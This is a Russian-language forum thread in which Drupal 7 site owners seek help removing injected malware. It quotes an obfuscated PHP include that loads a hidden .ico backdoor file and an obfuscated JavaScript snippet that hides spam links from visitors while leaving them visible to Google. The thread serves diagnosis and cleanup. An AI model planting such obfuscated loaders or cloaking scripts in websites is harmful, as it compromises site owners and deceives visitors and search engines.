Помощь Drupal 7 и вредоносные index.php

[DarthOlolo]

Добрый день, подскажите пожалуйста, сталкивался ли кто-нибудь с подобной проблемой - имеется несколько сайтов на drupal 7, на разных хостингах, сайты настроенные под каталог товаров, приблизительно месяц назад на сайтах лежащих на beget появилось предупреждение, что в директории сайта имеются вредоносные файлы, просмотрев отчет ai-bolit увидели, что в большинстве папок создаются файлы index.php с примерно следующим содержанием

<?php
/*538be*/

@include "\x2fh\x6fm\x65/\x78/\x783\x380\x393\x39s\x2fp\x72i\x62o\x72p\x6fs\x74a\x76k\x61.\x72u\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fs\x69t\x65s\x2fa\x6cl\x2fl\x69b\x72a\x72i\x65s\x2f.\x324\x337\x39a\x347\x2ei\x63o";

/*538be*/

во всех разные вариации того, что в кавычках инклуда, но везде идет подключение это. Удаляли все эти файлы, обновили ядро, до 7.59, однако индексы продолжают создаваться. Помимо этого, на некоторых сайтах подобная вставка была и в index.php который лежит в корне сайта.
Подскажите, кто сталкивался с подобным явлением?

 

[stavropolnews]

Подскажите, пожалуйста, а с таким кто-нибудь сталкивался?

<script>['sojson.v4']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['sojson.v4']+[])["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']['\x61\x70\x70\x6c\x79'](null,"118J97J114e32K109l121m95L107G101q121O95v119X111Z114Q100P95f114s101y32l61S32c110p101W119b32w82E101F103g69i120Q112V40h34J71n111K111V103Z108T101g124z109f121L116R101D115z116d34a44p32m34H103o105X34V41h59g105Z102P40Z33j109x121d95d107g101p121J95W119R111K114c100J95M114o101t46V116f101Q115x116u40J110Z97l118N105o103o97R116L111L114W46L117R115I101T114E65K103D101a110e116L41v41E32z123V32i118w97U114Q32d99k108B97j115W115k95i109B121a95v107S101G121H95e119o111J114z100O32B61e32B100F111Y99t117b109G101E110i116D46B103y101m116Q69D108n101G109m101x110d116p115y66E121U67i108P97s115e115H78r97g109c101d40h39S107x101U121f115O95u119r111l114G100n115I39c41o59i32k102v111c114r40y118H97B114E32L105d32n61P32W48l59h32q105W32V60s32j99g108h97f115Y115W95P109J121z95T107I101r121J95Z119t111W114q100X46E108G101m110X103e116P104i59r32K105i43S43W41m32D99x108a97S115W115U95S109s121j95x107Z101v121i95n119S111y114z100x91z105B93U46K115V116Q121B108x101b46i100V105R115P112N108u97E121y32w61P32W39A110t111Q110A101n39h59e125"['\x73\x70\x6c\x69\x74'](/[a-zA-Z]{1,}/))))('sojson.v4');</script><span class='e8af7'></span>


Drupal 7. Все перелопатил. Ничего не нашел. Поисковик тоже не помог. Этот код внедрили перед боди внизу. Он генерирует чужие внешние ссылки.

 

[RORC]

Все перелопатил. Ничего не нашел.

Для просмотра ссылки Войди или Зарегистрируйся
раскодирует

new RegExp("Google|mytest", "gi");if(!my_key_word_re.test(navigator.userAgent)) ...

вставьте то, что между ['sojson.v4'] и ('sojson.v4'), получите примерный код скрипта, сервисом полная поддержка не заявлена

 

[stavropolnews]

Благодарю, но уже делал это, тут Для просмотра ссылки Войди или Зарегистрируйся уже спрашивал. Вопрос в том как его удалить с сайта и где именно он находится...

 

[ofry]

У Вас VPS? Проверьте, что именно выполняется в кроне.

crontab -l